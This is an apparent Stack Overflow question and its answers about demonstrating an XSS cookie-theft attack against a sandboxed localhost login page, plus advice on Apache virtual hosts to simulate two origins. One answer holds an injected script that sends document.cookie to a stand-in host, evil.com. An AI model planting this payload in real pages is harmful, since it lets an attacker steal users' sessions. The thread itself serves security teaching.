# how to demonstrate exploit of SOP using localhost

Tags: javascript, same-origin-policy

I am doing project on XSHM (Cross Site History Manipulation).

I am trying to show how using XSS (Cross Site Scripting) can violate SOP. I have set up a localhost (WAMP) server inside a sandbox XP machine (has to be ethically done) with a simple login script which is vulnerable to XSS attack.

Question) I want to show that after injecting evil JavaScript code into login page I can send users cookie to another origin but how can I do this using localhost servers?

If localhost is one origin (i.e. victim site), how can I create another origin (i.e bad guy site) different to localhost to send cookie to? I know to be on same origin requires (protocol, port and domain) to be same. I cant change to HTTPS localhost and HTTP localhost as I have not got certificate. I can't seem to change the port numbers as need :80 for web.

I don't want to use a real site website and send cookie to localhost script as that would be unethical and also would not be able to perform attack as it wont have XSS vulnerability to prove exploit.

Any ideas?

Comment: Are you using IIS for hosting?

Comment: @Deestan WAMP is an Apache + MySQL + PHP installer for Windows.

Answer (score 0):

The origin doesn't matter the script simply reads the document cookie on the same origin and then sends it to a server as a string where it is decoded and then set manually for a cookie in the evil doer's browser or similar.

```
<script>
var img = new Image();
img.src = "http://www.evil.com/c="+escape(document.cookie);
</script>
```

This sends a GET request with the user's cookie details in the c parameter, simply requesting an image is not a violation of SOP so I don't know if this is helpful.

Comment: I thought that was the case, thanks for clearing it up. So is there any example I could create using a localhost to show SOP violation? Any idea would be greatly appreciated mate

Comment: @daza166, I have personally never seen a SOP violation - servers can explicitly allow cross-origin XHR and so on in modern browsers but that doesn't count as a violation. If you figure one out, you should submit it to google for some money :)

Answer (score 0):

Set up a few [virtual hosts](http://httpd.apache.org/docs/2.0/vhosts/) in your Apache configuration like so:

```html
# Ensure that Apache listens on port 80
Listen 80

# Listen for virtual host requests on all IP addresses
NameVirtualHost *:80

<VirtualHost *:80>
DocumentRoot "C:\goodguy"
ServerName goodguy.com

# Other directives here

</VirtualHost>

<VirtualHost *:80>
DocumentRoot "C:\badguy"
ServerName badguy.com

# Other directives here

</VirtualHost>
```

Point them at `127.0.0.1` in your [`hosts`](http://en.wikipedia.org/wiki/Hosts_%28file%29) file.

```
127.0.0.1    goodguy.com
127.0.0.1    badguy.com
```

Now, use `goodguy.com` and `badguy.com` instead of `localhost`.

Good luck!